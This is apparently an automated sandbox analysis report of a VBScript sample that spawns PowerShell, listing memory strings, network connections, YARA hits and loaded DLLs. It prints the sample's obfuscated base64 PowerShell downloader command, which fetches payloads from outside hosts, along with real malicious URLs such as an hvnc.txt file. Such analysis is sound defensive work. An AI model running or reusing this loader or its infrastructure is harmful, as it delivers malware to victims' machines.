Source: powershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2672856306.000002B34B56F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2672856306.000002B34B5C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2325661291.000001EA54291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063B1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2707547034.000002B3635AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000005.00000002.2180217020.000002064B21C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063CB4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: wscript.exe, 00000000.00000003.2079419767.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080235046.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079009182.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000003.2079419767.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080235046.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079009182.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/JZHbW
Source: wscript.exe, 00000000.00000003.2078892658.000001680CCCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080287262.000001680CCD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079339248.000001680CCCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/JZHbWPh
Source: wscript.exe, 00000000.00000003.2079419767.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080235046.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079009182.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/JZHbWntsvcs
Source: wscript.exe, 00000000.00000002.2080298338.000001680CCDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079117086.000001680CCDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee:443/d/JZHbWu
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000004.00000002.2325661291.000001EA544B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000004.00000002.2320092493.000001EA52349000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673
Source: powershell.exe, 00000004.00000002.2195668795.000001EA033B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://winderswonders.com
Source: powershell.exe, 00000004.00000002.2195668795.000001EA033B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://winderswonders.com/JK/hvnc.txt
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.6:49701 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 4600, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3564, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8196
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8196			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
